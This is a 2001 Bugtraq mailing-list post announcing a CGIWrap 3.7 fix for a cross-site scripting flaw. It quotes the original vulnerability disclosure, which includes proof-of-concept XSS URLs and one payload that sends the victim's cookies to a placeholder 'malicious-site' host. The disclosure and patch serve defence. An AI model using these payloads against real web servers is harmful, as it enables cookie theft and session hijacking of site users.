[21771] in bugtraq
Re: [cgiwrap-users] Re: Security hole in CGIWrap (cross-site scripting
daemon@ATHENA.MIT.EDU (Nathan Neulinger)
Mon Jul 23 11:58:57 2001
Message-ID: <3B5B0FB7.29BC5DFF@umr.edu>
Date: Sun, 22 Jul 2001 12:39:03 -0500
From: Nathan Neulinger <nneul@umr.edu>
MIME-Version: 1.0
To: "TAKAGI, Hiromitsu" <takagi@etl.go.jp>,
cgiwrap-users@lists.sourceforge.net, bugtraq@securityfocus.com
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
The following cross-site scripting vulnerability was reported in
cgiwrap. This has just been corrected in version 3.7, which has just been
released.
http://prdownloads.sourceforge.net/cgiwrap/cgiwrap-3.7.tar.gz
All error message output is now html encoded to prevent this problem.
-- Nathan
> "TAKAGI, Hiromitsu" wrote:
> >
> > Hi,
> >
> > I found a cross-site scripting vulnerability in CGIWrap. Cookies
> > issued by the server on which CGIWrap is installed can be stolen.
> >
> > Please try to access the following URLs.
> >
> > Confirming the bug:
> > http://www.unixtools.org/cgi-bin/cgiwrap/%3CS%3E
> > http://www.unixtools.org/cgi-bin/cgiwrap/<S>
> > http://www.unixtools.org/cgi-bin/cgiwrap/~nneul/<S>TEST</S>
> > JavaScript code will be executed:
> > http://www.unixtools.org/cgi-bin/cgiwrap/~nneul/<SCRIPT>alert(document.domain)</SCRIPT>
> > http://www.unixtools.org/cgi-bin/cgiwrap/~nneul/<SCRIPT>document.write(document.domain)</SCRIPT>
> > http://www.unixtools.org/cgi-bin/cgiwrap/<IMG%20SRC=javascript:alert(document.domain)>
> > Stealing your Cookies issued by www.unixtools.org, if any:
> > http://www.unixtools.org/cgi-bin/cgiwrap/~nneul/<SCRIPT>window.open("http://malicious-site/save.cgi%3F"+escape(document.cookie))</SCRIPT>
> >
<snip>
> >
> > Regards,
> > --
> > Hiromitsu Takagi, Ph.D.
> > National Institute of Advanced Industrial Science and Technology,
> > Tsukuba Central 2, 1-1-1, Umezono, Tsukuba, Ibaraki 305-8568, Japan
> > http://www.etl.go.jp/~takagi/
>
> _______________________________________________
> cgiwrap-users mailing list
> cgiwrap-users@lists.sourceforge.net
> http://lists.sourceforge.net/lists/listinfo/cgiwrap-users
--
------------------------------------------------------------
Nathan Neulinger EMail: nneul@umr.edu
University of Missouri - Rolla Phone: (573) 341-4841
CIS - Systems Programming Fax: (573) 341-4216